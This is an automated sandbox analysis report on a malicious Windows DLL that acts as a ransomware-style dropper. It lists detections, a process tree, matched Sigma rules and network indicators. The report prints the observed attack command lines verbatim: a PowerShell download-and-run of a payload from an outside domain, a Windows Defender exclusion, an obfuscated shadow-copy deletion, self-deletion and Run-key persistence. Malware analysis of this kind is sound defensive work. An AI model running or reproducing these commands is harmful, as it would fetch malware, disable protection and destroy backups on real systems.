Windows Analysis Report
TD2HjoogPx.dll

Overview

General Information

Sample name: TD2HjoogPx.dll (renamed because original name is a hash value)
Original sample name: fccd129f6a5b9d2133d14922a3614f02.dll
Analysis ID: 1575339
MD5: fccd129f6a5b9d2133d14922a3614f02
SHA1: e814c637e6f0c21f3aa9b43fb92cb161b4d451fc
SHA256: 4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e
Tags: dll, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Delete shadow copy via WMIC
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes shadow drive data (may be related to ransomware)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Powershell drops PE file
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Ping/Del Command Combination
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7876 cmdline: loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7972 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7984 cmdline: rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 8060 cmdline: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8112 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 7532 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 768 cmdline: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3352 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 4128 cmdline: cmd /c %temp%/eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8044 cmdline: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • powershell.exe (PID: 8068 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 6056 cmdline: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • powershell.exe (PID: 1548 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5272 cmdline: cmd /c %temp%/eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • eryy65ty.exe (PID: 6860 cmdline: C:\Users\user\AppData\Local\Temp/eryy65ty.exe MD5: 9049FABA5517305C44BD5F28398FB6B9)
        • WMIC.exe (PID: 332 cmdline: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • eryy65ty.exe (PID: 2332 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9)
    • WMIC.exe (PID: 7980 cmdline: c:\xGRceo\xGRc\..\..\Windows\xGRc\xGRc\..\..\system32\xGRc\xGRc\..\..\wbem\xGRc\xGRce\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 6480 cmdline: c:\klzShx\klzS\..\..\Windows\klzS\klzS\..\..\system32\klzS\klzS\..\..\wbem\klzS\klzSh\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6272 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 316 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • eryy65ty.exe (PID: 4492 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9)
    • WMIC.exe (PID: 4656 cmdline: c:\ZiHrdF\ZiHr\..\..\Windows\ZiHr\ZiHr\..\..\system32\ZiHr\ZiHr\..\..\wbem\ZiHr\ZiHrd\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 6552 cmdline: c:\NTdKVj\NTdK\..\..\Windows\NTdK\NTdK\..\..\system32\NTdK\NTdK\..\..\wbem\NTdK\NTdKV\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 708 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 4296 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • notepad.exe (PID: 5084 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
No yara matches

Operating System Destruction

Source: Process startedAuthor: Joe Security: Data: Command: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, CommandLine: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 6860, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, ProcessId: 332, ProcessName: WMIC.exe

System Summary

Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 7876, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 8044, ProcessName: cmd.exe
Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\eryy65ty.exep.p.dQ.s.CdQp..F.....V...W..$.... "#(...."Hs..8..sc..S..i"..#Xs.,s..L...S.}..s.s.s.s.s.....s......s....s....sJ..li,sr...<sE.........i<.<.Y.s.s....Ls)VY.V.s^EY..YXs.sF.+.s.E...G<.Y, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 6860, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 7876, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 8044, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, CommandLine: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 6860, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, ProcessId: 332, ProcessName: WMIC.exe
Source: Process startedAuthor: Ilya Krestinichev: Data: Command: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", CommandLine: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 2332, ParentProcessName: eryy65ty.exe, ProcessCommandLine: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", ProcessId: 6272, ProcessName: cmd.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\eryy65ty.exep.p.dQ.s.CdQp..F.....V...W..$.... "#(...."Hs..8..sc..S..i"..#Xs.,s..L...S.}..s.s.s.s.s.....s......s....s....sJ..li,sr...<sE.........i<.<.Y.s.s....Ls)VY.V.s^EY..YXs.sF.+.s.E...G<.Y, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 6860, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW
Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, CommandLine: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 6860, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, ProcessId: 332, ProcessName: WMIC.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, CommandLine: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 7876, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, ProcessId: 6056, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 7876, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 8044, ProcessName: cmd.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 2332, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, CommandLine: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 7876, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, ProcessId: 6056, ProcessName: cmd.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8044, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 8068, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: https://kiltone.top/stelin/Gosjeufon.cpl, Avira URL Cloud: Label: malware
Source: https://kiltone.top/stelin/Gosjeufon.cpl, Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, Virustotal: Detection: 66%
Source: TD2HjoogPx.dll, Virustotal: Detection: 44%
Source: TD2HjoogPx.dll, ReversingLabs: Detection: 36%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, Code function: 20_2_00E784E0 __Mtx_unlock,__Mtx_init_in_situ,BCryptGenRandom,BCryptCloseAlgorithmProvider,SetLastError,20_2_00E784E0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, Code function: 20_2_00E785F0 BCryptGenRandom,BCryptCloseAlgorithmProvider,20_2_00E785F0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, Code function: 20_2_00E77EE0 BCryptOpenAlgorithmProvider,SetLastError,___std_exception_copy,20_2_00E77EE0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, Code function: 20_2_00E78020 GetLastError,BCryptCloseAlgorithmProvider,20_2_00E78020
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, Code function: 20_2_00E783F0 BCryptCloseAlgorithmProvider,20_2_00E783F0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, Code function: 20_2_00E78420 BCryptGenRandom,SetLastError,20_2_00E78420
Source: TD2HjoogPx.dll, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknown, HTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: TD2HjoogPx.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: Z:\scvhost\Release\scvhost.pdb source: eryy65ty.exe, 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 00000014.00000000.1580004166.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001B.00000000.1754914879.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001E.00000000.1837388986.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe.14.dr
Source: Binary string: Z:\lderd\Release\lderd.pdb source: loaddll32.exe, 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp, TD2HjoogPx.dll
Source: Binary string: Z:\scvhost\Release\scvhost.pdbd source: eryy65ty.exe, 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 00000014.00000000.1580004166.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001B.00000000.1754914879.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001E.00000000.1837388986.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe.14.dr
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6D419B85 FindFirstFileExA,0_2_6D419B85
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, Code function: 20_2_00E3DF60 IsDebuggerPresent,GetLastError,FindFirstFileW,GetLastError,GetLastError,GetLastError,CopyFileA,Sleep,FindNextFileW,GetLastError,FindClose,20_2_00E3DF60
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, Code function: 20_2_00EAAB8F FindFirstFileExA,20_2_00EAAB8F
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, File opened: D:\sources\migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, File opened: D:\sources\replacementmanifests\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, File opened: D:\sources\migration\wtr\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, File opened: D:\sources\replacementmanifests\hwvid-migration-2\

Networking

Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: Joe Sandbox View, ASN Name: TELE-ASTeleAsiaLimitedHK TELE-ASTeleAsiaLimitedHK
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic, HTTP traffic detected: GET /stelin/Gosjeufon.cpl HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682, Host: kiltone.top, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /stelin/Gosjeufon.cpl HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682, Host: kiltone.top, Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /stelin/Gosjeufon.cpl HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682, Host: kiltone.top, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /stelin/Gosjeufon.cpl HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682, Host: kiltone.top, Connection: Keep-Alive
Source: global traffic, DNS traffic detected: DNS query: kiltone.top
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp, loaddll32.exe, 00000000.00000002.2671467512.000000000160F000.00000004.00000020.00020000.00000000.sdmp, TD2HjoogPx.dll; String found in binary or memory: https://digify.com/a/#/access/login
Source: loaddll32.exe, 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp, TD2HjoogPx.dll; String found in binary or memory: https://digify.com/a/#/access/logincmd
Source: extensions.json.27.dr; String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: prefs.js.27.dr; String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: TD2HjoogPx.dll; String found in binary or memory: https://kiltone.top/stelin/Gosjeufon.cpl
Source: cmd.exe, 0000000B.00000002.1578519610.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1563802595.0000000002B90000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown HTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.8:49707 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

